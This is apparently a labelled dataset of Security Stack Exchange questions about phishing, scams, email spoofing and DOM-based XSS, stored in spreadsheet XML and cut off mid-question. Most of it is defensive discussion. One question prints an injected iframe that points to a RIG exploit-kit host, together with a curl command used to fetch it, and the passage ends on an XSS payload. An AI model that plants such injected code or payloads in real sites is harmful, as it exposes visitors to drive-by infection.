 &lt;ul&gt;
 &lt;li&gt;Machines infected with malware from the phishing campaign will lock the screen with a humorous message&lt;/li&gt;
 &lt;li&gt;Machines infected with malware from the evil USB's will lock the screen with a different humorous message&lt;/li&gt;
 &lt;li&gt;A "mail bomber" will fill the inboxes of everyone&lt;/li&gt;
 &lt;li&gt;A "skype bomber" will call everyone in the office at the same time&lt;/li&gt;
 &lt;li&gt;Strong DDOS of the website&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;My questions are as follows:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Which other attacks can I perform that are "visual" for a TV show?&lt;/li&gt;
 &lt;li&gt;Any suggestion on the implementation of the attacks?&lt;/li&gt;
 &lt;li&gt;Is it realistic? As professionals and experts, what would you like to 
 see?&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Remember that the intention is educational for the broad public, but should not show made up stuff that would alarm seasoned InfoSec professionals.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;penetration-test&gt;&lt;ransomware&gt;&lt;social-engineering&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>Understanding the attack impact or concequences</t>
  </si>
  <si>
    <t>Legal Concerns</t>
  </si>
  <si>
    <t>Legal Issues around simulated phishing attacks</t>
  </si>
  <si>
    <t>&lt;p&gt;We are putting together a service for use both internally and for our clients using GoPhish to test users' awareness of phishing. Basically, the users will receive a phishing email and we will measure how many users open the email, click links, and disclose information.&lt;/p&gt;
 &lt;p&gt;I have two concerns from a legal perspective (we are based in the UK and only have UK based clients).&lt;/p&gt;
 &lt;p&gt;1) If I put together an email that looks like it comes from Amazon, could they sue me for using their brand without permission?&lt;/p&gt;
 &lt;p&gt;2) In order to conduct the campaign we will need to store users' names, email addresses and other information. Once GDPR comes into effect we would need consent to store these details (AFAIK), but if we ask the user first that defeats the objective. Is there any way around this restriction?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;legal&gt;</t>
  </si>
  <si>
    <t>What can someone gain from basic personal data?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've recently received a series of weird emails which I believe to be phishing attempts, the only thing is, I'm not quite sure what they're going for and I'd really love to figure it out.&lt;/p&gt;
 &lt;p&gt;The emails are sent from a babysitting site run by our school which I am a part of, I've asked friends and the emails seem to be going to most students with accounts on the site, not just me. The sender asks for babysitting for their child, then if you follow up, the send a super long email written in poor English with random details about the family and kids always including this bit:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;I will also instruct our estate agent to mail the keys of the
  apartment to you so as to do all other necessary preparations before
  we arrive.The following information would be needed to make out the
  check to you and to get an head start&lt;/p&gt;
  &lt;p&gt;Full Name: 
  Full address with zip-code &amp;amp; Apt Number: 
  Age: 
  Gender: 
  Phone number: 
  Acceptance of offer: 
  What time you would be available during selected days: 
  Do you have any special attitude? 
  Do you have any crime records?&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I've received two sets of these messages so far, in each, the names and family details are changed but everything else remains identical. Additionally, the sender always claims to be some executive assistant at one of our grad schools but uses the name of an undergraduate student, even faking their email address to look like it comes from our school (something like studentname.schoolname@gmail.com)&lt;/p&gt;
 &lt;p&gt;I know they're trying to get something, but I can't figure out what they might gain with just your name address and phone number? &lt;/p&gt;
 &lt;p&gt;On another note, I've reported these emails to my school but they really haven't taken any action, all they've said is to ignore the emails. It seems like there's a bit of a security breach here though if this person is able to make an account on the babysitting site (you need a school ID or other official login to get on) and is also stealing the names of undergrad students (admittedly less difficult but still weird). &lt;/p&gt;
 &lt;p&gt;Shouldn't there be a way for the school to track the user and see how they first created their account and gained access to the system and prevent future attempts? At least they could send out a warning email to the students with accounts on the babysitting site right?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>Inspecting attachments, emails, or websites safely</t>
  </si>
  <si>
    <t>Sandbox for attachment accessment</t>
  </si>
  <si>
    <t>&lt;p&gt;I am currently trying to review an e-mail sent to myself, that could be malicious, or it could not. I would like to create a sandbox environment to review this kind of message (it's more than likely this will be more than a one off activity), and want to know the safest / best way to create this. &lt;/p&gt;
 &lt;p&gt;I've read some other threads that suggest a VM environment with no network connectivity (&lt;a href="https://security.stackexchange.com/questions/32928/how-do-i-safely-inspect-a-suspicious-email-attachment"&gt;How do I safely inspect a suspicious email attachment?&lt;/a&gt;) but unsure of how I would then get access to the e-mail in question without downloading it?&lt;/p&gt;
 &lt;p&gt;Any help much appreciated. &lt;/p&gt;
 &lt;p&gt;&lt;em&gt;EDIT&lt;/em&gt; 
 After the responses below, I implemented the tools mentioned and followed the steps to good effect. I have however found a tool that seems to allow for sandboxing within a browser, allowing me to quickly reviewing suspicious attachments within a safe environment. I run it within a disconnected VM. The tool is called Sandboxie (&lt;a href="https://www.sandboxie.com/" rel="nofollow noreferrer"&gt;https://www.sandboxie.com/&lt;/a&gt;). &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;spam&gt;&lt;phishing&gt;&lt;sandbox&gt;&lt;email-attachments&gt;</t>
  </si>
  <si>
    <t>Analysing phishing emails</t>
  </si>
  <si>
    <t>Scamming explanation</t>
  </si>
  <si>
    <t>&lt;p&gt;I've just received a scam SMS with that invite me to click on a link to check a delivery.
 Since I was curious about where it could lead, I opened a VM and set up a VPN, then clicked on the link. After different redirects I ended up on Google. So I'm wondering about the aim of this scam SMS.&lt;/p&gt;
 &lt;p&gt;Here there the HTTP responses (I obscured the cookies):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;HTTP/1.1 302 Found
 Server: nginx/1.16.1
 Date: Fri, 23 Apr 2021 15:49:07 GMT
 Content-Type: text/html; charset=utf-8
 Content-Length: 208
 Connection: close
 Access-Control-Allow-Origin: *
 Location: https://track.drerries.com/8d912287-1150-46dc-8dc5-999464f50468?af=39&amp;amp;no=30-35
 Vary: Accept
 &amp;lt;p&amp;gt;Found. Redirecting to &amp;lt;a href=&amp;quot;https://track.drerries.com/8d912287-1150-46dc-8dc5-999464f50468?af=39&amp;amp;amp;no=30-35&amp;quot;&amp;gt;https://track.drerries.com/8d912287-1150-46dc-8dc5-999464f50468?af=39&amp;amp;amp;no=30-35&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
 HTTP/1.1 200 
 Server: nginx
 Date: Fri, 23 Apr 2021 15:49:27 GMT
 Content-Type: text/html;charset=UTF-8
 Connection: close
 Cache-Control: no-store, no-cache, pre-check=0, post-check=0
 Expires: Thu, 01 Jan 1970 00:00:00 GMT
 Pragma: no-cache
 Set-Cookie: XXXXXX Expires=Sat, 24-Apr-2021 15:49:27 GMT; Domain=track.drerries.com; Path=/; Secure; HttpOnly;SameSite=None
 Set-Cookie: XXXXXX; Max-Age=31536000; Expires=Sat, 23-Apr-2022 15:49:27 GMT; Domain=track.drerries.com; Path=/; Secure; HttpOnly;SameSite=None
 Content-Length: 359
 &amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;link rel=&amp;quot;icon&amp;quot; type=&amp;quot;image/gif&amp;quot; href=&amp;quot;data:image/gif;base64,R0lGODlhAQABAPAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==&amp;quot;/&amp;gt;&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;URL='https://track.drerries.com:443/redirect?target=BASE64aHR0cDovL2dvb2dsZS5jb20&amp;amp;ts=1619192967438&amp;amp;hash=ogrCi1dIa7dWRxmVYfvbI_C2LDRrEOdTgzbxKxsLjaA&amp;amp;rm=D'&amp;quot; /&amp;gt;&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
 HTTP/1.1 200 
 Server: nginx
 Date: Fri, 23 Apr 2021 15:49:36 GMT
 Content-Type: text/html;charset=UTF-8
 Content-Length: 229
 Connection: close
 Cache-Control: no-store, no-cache, pre-check=0, post-check=0
 Expires: Thu, 01 Jan 1970 00:00:00 GMT
 Pragma: no-cache
 &amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;link rel=&amp;quot;icon&amp;quot; type=&amp;quot;image/gif&amp;quot; href=&amp;quot;data:image/gif;base64,R0lGODlhAQABAPAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==&amp;quot;/&amp;gt;&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;URL='http://google.com'&amp;quot; /&amp;gt;&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Understanding the spoofing technique</t>
  </si>
  <si>
    <t>Actual domain names in phising posts?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received a paypal scam email yesterday in the mail(*), which isn't particularly noteworthy, apart from the fact that not only was the sender paypal.com but the post was sent from mx4.slc.paypal.com.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Authentication-Results: spf=pass (sender IP is 173.0.84.229)
 smtp.mailfrom=paypal.com; dkim=pass (signature was verified)
 header.d=paypal.com;dmarc=pass action=none
 header.from=paypal.com;compauth=pass reason=100
 Received-SPF: Pass (protection.outlook.com: domain of paypal.com designates
 173.0.84.229 as permitted sender) receiver=protection.outlook.com;
 client-ip=173.0.84.229; helo=mx4.slc.paypal.com; pr=C
 Received: from mx4.slc.paypal.com (173.0.84.229) by
 BN7NAM10FT057.mail.protection.outlook.com (10.13.157.147) with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id
 15.20.5438.12 via Frontend Transport; Tue, 19 Jul 2022 20:44:26 +0000
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;How is this possible?&lt;/p&gt;
 &lt;p&gt;(*) According to Paypal the first check with paypal emails is to see if the user's full name is stated at the start of the email, it wasn't just a generic &amp;quot;Dear paypal user&amp;quot;&lt;/p&gt;</t>
  </si>
  <si>
    <t>Phishing with links to real site (facebook) - what could they possibly gain?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was sent an innocuous and genuine looking e-mail with "Welcome back to Facebook" from the address "notification+mnqx54sr@facebookmail.com". I deactivated my account long ago, so was a tad surprised. I was fooled since both the links in the e-mail were directed to the real facebook site, and the actual e-mail addy did not show, just the name, which was "facebook".&lt;/p&gt;
 &lt;p&gt;But this lead me wondering, as both the links in the e-mail were to the real facebook page, what could the sender possibly gain from such an e-mail?&lt;/p&gt;
 &lt;p&gt;Edits:&lt;/p&gt;
 &lt;p&gt;The e-mail addy was &lt;code&gt;notification+mnqx54sr@facebookmail.com&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;Here is the e-mail (I changed my e-mail addy to myid and the server name to myserver):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Return-Path: &amp;lt;notification+mnqx54sr@facebookmail.com&amp;gt;
 Received: from kasse06.itea.myserver (kasse06.itea.myserver [129.241.56.234])
  by mot.itea.myserver (Cyrus v2.3.16-Fedora-RPM-2.3.16-6.el6_2.5) with LMTPA;
  Sat, 03 May 2014 05:39:27 +0200
 X-Sieve: CMU Sieve 2.3
 Received: from localhost (localhost [127.0.0.1])
  by kasse06.itea.myserver (Postfix) with ESMTP id 806762000F2
  for &amp;lt;myidbak@stud.myserver&amp;gt;; Sat, 3 May 2014 05:39:27 +0200 (CEST)
 X-Virus-Scanned: Debian amavisd-new at kasse06.itea.myserver
 X-Spam-Flag: NO
 X-Spam-Score: -1.1
 X-Spam-Level: 
 X-Spam-Status: No, score=-1.1 tagged_above=-999 required=5
  tests=[BAYES_00=-3.6, DKIM_SIGNED=-0.001, DKIM_VALID=-0.1,
  DKIM_VALID_AU=-0.1, DKIM_VERIFIED=-0.1, HTML_MESSAGE=0.001,
  NTNU_PH_MAIL_SA=1.5, NTNU_PH_PHRS_91=2.9, NTNU_PH_URL_98=0.1,
  RCVD_IN_DNSWL_LOW=-0.7, SPF_PASS=-0.001, T_NTNU_NICE_DKIM_SPF=-1,
  UNPARSEABLE_RELAY=0.001] autolearn=no
 Authentication-Results: kasse06.itea.myserver (amavisd-new); dkim=pass
  header.i=@facebookmail.com
 Received: from mx-out.facebook.com (outmail017.ash2.facebook.com [66.220.155.151])
  by kasse06.itea.myserver (Postfix) with ESMTP id 9750A2003C2
  for &amp;lt;myidbak@stud.myserver&amp;gt;; Sat, 3 May 2014 05:39:24 +0200 (CEST)
 Received: from facebook.com (2lkICU/ZQQWprcP9zKuyAff/Lpyxvuvbl+Y44S1SuODxClBxdtqLF4w+pN51v+j+ 10.224.41.89)
  by facebook.com with Thrift id 841465dad27411e3bddc0002c9e0e150-14dc74a0;
  Fri, 02 May 2014 20:39:22 -0700
 X-Facebook: from 2401:db00:3010:6056:face:0:4f:0 ([MTI3LjAuMC4x]) 
  by www.facebook.com with HTTP (ZuckMail);
 Date: Fri, 2 May 2014 20:39:22 -0700
 To: myid Bakken Stovner &amp;lt;myidbak@stud.myserver&amp;gt;
 From: "Facebook" &amp;lt;notification+mnqx54sr@facebookmail.com&amp;gt;
 Reply-to: noreply &amp;lt;noreply@facebookmail.com&amp;gt;
 Subject: Welcome back to Facebook
 Message-ID: &amp;lt;6489aeacae881e13b9c2861e43ed7de5@www.facebook.com&amp;gt;
 X-Priority: 3
 X-Mailer: ZuckMail [version 1.00]
 Errors-To: notification+mnqx54sr@facebookmail.com
 X-Facebook-Notify: account_reactivation; mailid=9ce6218G2dd50372G0G158G3452e4b1
 X-FACEBOOK-PRIORITY: 0
 X-Auto-Response-Suppress: All
 MIME-Version: 1.0
 Content-Type: multipart/alternative;
  boundary="b1_6489aeacae881e13b9c2861e43ed7de5"
 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=facebookmail.com;
  s=s1024-2013-q3; t=1399088362;
  bh=9qoIL602ssAgEP/GBOT1a+TiZQpVHk1yxgybG72Q35c=;
  h=Date:To:From:Subject:MIME-Version:Content-Type;
  b=tVwl5S3WQ746wxhzHqG4iE9Kr5tLrybLPKLPlP+uTo0zon/XiJbu2n0RDsI7rv+1H
  /+W0Dhv/NbuNuXDbrvxPHHA5CPuboFQ8iT44S/tv139l+ZUt+GJDoN2g3V/GMGjha0
  yLwtXftW2J7p7EOAEWMCHq0VcTq44B0+/yB2oK9w=
 --b1_6489aeacae881e13b9c2861e43ed7de5
 Content-Type: text/plain; charset="UTF-8"
 Content-Transfer-Encoding: quoted-printable
 Hi myid,
 Hey myid,
 The Facebook account associated with myidbak@stud.myserver was recently =
 reactivated.
 If you were not the one who reactivated this account, please visit our =
 Help Center.
 Thanks,
 The Facebook Team
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 This message was sent to myidbak@stud.myserver at your request.
 Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA =
 94303
 --b1_6489aeacae881e13b9c2861e43ed7de5
 Content-Type: text/html; charset="UTF-8"
 Content-Transfer-Encoding: quoted-printable
 &amp;lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional =
 //EN"&amp;gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;Facebook&amp;lt;/title&amp;gt;&amp;lt;meta http-equiv=3D"Content-Type" =
 content=3D"text/html; charset=3Dutf-8" /&amp;gt;&amp;lt;/head&amp;gt;&amp;lt;body =
 style=3D"margin:0;padding:0;" dir=3D"ltr"&amp;gt;&amp;lt;table cellspacing=3D"0" =
 cellpadding=3D"0" id=3D"email_table" =
 style=3D"border-collapse:collapse;width:98%;" border=3D"0"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 id=3D"email_content" style=3D"font-family:&amp;amp;#039;lucida =
 grande&amp;amp;#039;,tahoma,verdana,arial,sans-serif;font-size:12px;"&amp;gt;&amp;lt;span =
 style=3D"width:620px;color:#FFFFFF;display:none =
 !important;font-size:1px;"&amp;gt;Hey myid, The Facebook account associated with =
 myidbak&amp;amp;#064;stud.myserver was recently reactivated. If you were not the =
 one who reactivated this account, please visit our Help Center =
 .&amp;lt;/span&amp;gt;&amp;lt;table cellspacing=3D"0" cellpadding=3D"0" =
 style=3D"border-collapse:collapse;width:620px;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"font-size:16px;font-family:&amp;amp;#039;lucida grande&amp;amp;#039;,tahoma,verda=
 na,arial,sans-serif;background:#3b5998;color:#FFFFFF;font-weight:bold;vert=
 ical-align:baseline;letter-spacing:-0.03em;text-align:left;padding:5px =
 20px;"&amp;gt;&amp;lt;a style=3D"text-decoration: none;" href=3D"https://www.facebook.co=
 m/n/?help%2Fsecurity&amp;amp;amp;medium=3Demail&amp;amp;amp;mid=3D9ce6218G2dd50372G0G158G3=
 452e4b1&amp;amp;amp;bcode=3D1.1399088362.AbnGaQM9xIhr_Mbi&amp;amp;amp;n_m=3Dmyidbak%40stu=
 d.myserver"&amp;gt;&amp;lt;span style=3D"background:#3b5998;color:#FFFFFF;font-weight:bol=
 d;font-family:&amp;amp;#039;lucida =
 grande&amp;amp;#039;,tahoma,verdana,arial,sans-serif;vertical-align:middle; =
 font-size:16px;letter-spacing:-0.03em;text-align:left;vertical-align:basel=
 ine;"&amp;gt;facebook&amp;lt;/span&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;table cellspacing=3D"0" =
 cellpadding=3D"0" width=3D"620px" =
 style=3D"border-collapse:collapse;width:620px;" border=3D"0"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"font-size:11px;font-family:LucidaGrande,tahoma,verdana,arial,sans=
 -serif;padding:0px;background-color:#f2f2f2;border-left:none;border-right:=
 none;border-top:none;border-bottom:none;"&amp;gt;&amp;lt;table cellspacing=3D"0" =
 cellpadding=3D"0" width=3D"620px" =
 style=3D"border-collapse:collapse;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td style=3D"font-size:11px;font-f=
 amily:LucidaGrande,tahoma,verdana,arial,sans-serif;padding:0px;width:620px=
 ;"&amp;gt;&amp;lt;table cellspacing=3D"0" cellpadding=3D"0" border=3D"0" =
 style=3D"border-collapse:collapse;width:100%;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"font-size:11px;font-family:LucidaGrande,tahoma,verdana,arial,sans=
 -serif;padding:20px;background-color:#fff;border-left:none;border-right:no=
 ne;border-top:none;border-bottom:none;"&amp;gt;&amp;lt;table cellspacing=3D"0" =
 cellpadding=3D"0" style=3D"border-collapse:collapse;width:100%;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"font-size:11px;font-family:LucidaGrande,tahoma,verdana,arial,sans=
 -serif;"&amp;gt;&amp;lt;table cellspacing=3D"0" cellpadding=3D"0" =
 style=3D"border-collapse:collapse;width:100%;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"font-size:11px;font-family:LucidaGrande,tahoma,verdana,arial,sans=
 -serif;padding-bottom:5px;"&amp;gt;&amp;lt;span style=3D"color:#333333;"&amp;gt;Hey =
 myid,&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td style=3D"font-size:11px;font-family:LucidaG=
 rande,tahoma,verdana,arial,sans-serif;padding-top:5px;padding-bottom:5px;"=
 &amp;gt;&amp;lt;span style=3D"color:#333333;"&amp;gt;The Facebook account associated with =
 myidbak&amp;amp;#064;stud.myserver was recently =
 reactivated.&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td style=3D"font-size:11px;font-family:L=
 ucidaGrande,tahoma,verdana,arial,sans-serif;padding-top:5px;"&amp;gt;&amp;lt;span =
 style=3D"color:#333333;"&amp;gt;If you were not the one who reactivated this =
 account, please visit our &amp;lt;a href=3D"https://www.facebook.com/n/?help%2Fse=
 curity&amp;amp;amp;medium=3Demail&amp;amp;amp;mid=3D9ce6218G2dd50372G0G158G3452e4b1&amp;amp;amp;bc=
 ode=3D1.1399088362.AbnGaQM9xIhr_Mbi&amp;amp;amp;n_m=3Dmyidbak%40stud.myserver" =
 style=3D"color:#3b5998;text-decoration:none;"&amp;gt;Help Center&amp;lt;/a&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;=
 &amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"font-size:11px;font-family:LucidaGrande,tahoma,verdana,arial,sans=
 -serif;padding:0px;width:620px;"&amp;gt;&amp;lt;table cellspacing=3D"0" =
 cellpadding=3D"0" width=3D"100%" border=3D"0" =
 style=3D"border-collapse:collapse;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td style=3D"font-size:11px;font-f=
 amily:LucidaGrande,tahoma,verdana,arial,sans-serif;padding:0;background-co=
 lor:#fff;border-left:none;border-right:none;border-top:1px solid =
 #ccc;border-bottom:none;"&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/=
 table&amp;gt;&amp;lt;table cellspacing=3D"0" cellpadding=3D"0" border=3D"0" =
 style=3D"border-collapse:collapse;width:620px;"&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td =
 style=3D"font-size:11px;font-family:&amp;amp;#039;lucida grande&amp;amp;#039;, tahoma, =
 verdana, arial, sans-serif;padding:30px 20px;background-color:#fff;border-=
 left:none;border-right:none;border-top:none;border-bottom:none;color:#9999=
 99;border:none;"&amp;gt;This message was sent to &amp;lt;a =
 href=3D"mailto:myidbak&amp;amp;#064;stud.myserver" style=3D"color:#3b5998;text-dec=
 oration:none;"&amp;gt;myidbak&amp;amp;#064;stud.myserver&amp;lt;/a&amp;gt; at your request.&amp;lt;br =
 /&amp;gt;Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA =
 94303&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;span style=3D"width:620px;"&amp;gt;&amp;lt;img =
 src=3D"https://www.facebook.com/email_open_log_pic.php?mid=3D9ce6218G2dd50=
 372G0G158G3452e4b1" style=3D"border:0;width:1px;height:1px;" =
 /&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
 --b1_6489aeacae881e13b9c2861e43ed7de5--
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>Malicious Software alert from US Department of Health and Human Services</t>
  </si>
  <si>
    <t>&lt;p&gt;I have received a mail from a certain Security Incident Response Team on behalf of a US Department and it says,&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;The below URL is currently being used to deliver a payload of malicious software to a visiting victim‚Äôs computer. The current malicious payload appears to be on a server under your control and we are working on behalf of &lt;strong&gt;US Department of Health and Human Services (HHS) to remove the infectious content.&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;The above URL has been compromised, code containing a malicious iframe that points to the RIG exploit kit has been added to the website. A sample of the iframe pointing to the RIG exploit kit is below.&lt;/p&gt;
  &lt;p&gt;3) On a Linux or Mac system, open the Terminal and execute the following command after removing all bracket characters ‚Äì these: [] ‚Äì and changing all instances of "hXXp" to "http":&lt;/p&gt;
  &lt;p&gt;curl -H
  "Referer:hXXp://www[.]ourhostedweb[.]com/index[.]php/url-name/"
  -H "User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "hXXp://www.victimweb[.]com/"&lt;/p&gt;
  &lt;p&gt;Search for the term "iframe" in the returned source code. There will be an iframe on line 105 whose source URL is the exploit kit content. Currently this content is being sourced from www[.]ourhostedweb[.]com ‚Äì this may change at any time as long as the site remains compromised. &lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;and the line number 105 contains the following iframe code:&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;&amp;lt;iframe src="http://gone.MDVEND.COM/?oq=m3WpvAoLeZRbFLhhUPULVAwn45aBlIX_qmnhkjUyRDK1sWA-xOKUTp1u9CWUbI&amp;amp;es_sm=147&amp;amp;q=wXjQMvXcJwDQD4bGMvrESLtNNknQA0KK2Iv2_dqyEoH9fmnihNzUSkr26B2aC&amp;amp;ie=Windows-1252&amp;amp;sourceid=yandex&amp;amp;aqs=yandex.114e103.406b1a7" width="258" height="266"&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/code&gt;&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt; 
  given contact in the mail Email: alert@internetidentity.com
  Office: +1.253.590.4100 x0 | Fax: +1.888.239.6932 x0&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;The site is developed by using Wordpress.&lt;/p&gt;
 &lt;p&gt;What are the necessary actions I can take for this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;attack-prevention&gt;&lt;phishing&gt;&lt;iframe&gt;</t>
  </si>
  <si>
    <t>What's the point of these weird spam emails</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been recently receiving a lot of SPAM emails that make no sense. There is content of one of them:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;"State authorities say they have arrested a suspect in the deadly shooting of five people, 
 almost 24 hours after a gunman opened fire in a crowded mall on . Washington State Patrol 
 confirmed the capture in a tweet. The 20-year-old suspect was taken into custody in Oak 
 Harbor, about 30 miles west of the crime scene in Burlington, a small town north of Seattle. 
 A press conference is set for 9:30 Eastern time night.In the 1970s, struggling actress 
 Jamie Lee Curtis landed the role of Laurie Strode in the seminal horror movie Halloween. 
 Since then, she's starred in dozens of movies (True Lies and Freaky to name a few) and 
 managed to become a best-selling author and a member of the House of Lords. It just goes to 
 show: If you don't get stabbed to death in the first hour, you'll do great! In the late 
 1980s, Curtis filed a patent for a diaper/baby wipe combo, so we've invited her to play a 
 game called "Eureka!" Three questions about inventors and their inventions. Dear Sugar 
 Radio is a weekly podcast from member station WBUR. Hosts Steve Ald and Cheryl Strayed 
 offer "radical empathy" and advice on everything from relationships and parenthood to 
 dealing with drug problems or anxiety."
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;And so It goes on with a wall of text which looks like it was combined from several internet articles. Interesting thing is that those email come in both english and somewhat polish translated version (It looks like it was translated by google translate). I'm pole and the email is registered in polish domain. &lt;/p&gt;
 &lt;p&gt;Those emails contain no hyperlinks, no attachments, and no way to put me in interaction which could possibly achieve anything compromising security of my data, It's just plain wall of meaningless text. &lt;/p&gt;
 &lt;p&gt;What can be point of spamming me with such emails? Is it a common occurence or am I just being trolled by somebody?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;spam&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Why attacker use several emails.</t>
  </si>
  <si>
    <t>Why would a scammer not reply with the same email?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was recently messaged over a website of an online marketplace regarding an advertisement of an item I was selling, whereupon the "buyer" asked me to contact them over an email they provided.&lt;/p&gt;
 &lt;p&gt;After messaging that email, the reply I received was from a different email (spelled very similarly) e.g. emailed &lt;code&gt;FakeName945@gmail.com&lt;/code&gt; to get a reply from &lt;code&gt;FakeName954@gmail.com&lt;/code&gt; (actual emails have been changed). I did not notice this at first until the body of the email made me suspicious of a scam.&lt;/p&gt;
 &lt;p&gt;Why would the scammer not reply with the same email?&lt;/p&gt;
 &lt;p&gt;I had considered that the email may serve as a "listening" address, and correspondence was delegated to individual scammers. If this where the case, why not just ask me to contact the email they would have replied with, in the first place?&lt;/p&gt;
 &lt;p&gt;I had also considered that this may be to filter more scam aware people, but wondering if there was more to it.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>How phishing tecniques are used in delivering attacks</t>
  </si>
  <si>
    <t>HOW is the malicious URL/payload is delivered to the user on a DOM based XSS attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_%28OTG-CLIENT-001%29" rel="nofollow"&gt;Testing for DOM based&lt;/a&gt; XSS at OWASP reads:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;The first hypothetical example uses the following client side code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;script&amp;gt;
 document.write("Site is at: " + document.location.href + ".");
 &amp;lt;/script&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
  &lt;p&gt;An attacker may append #alert('xss') to the affected
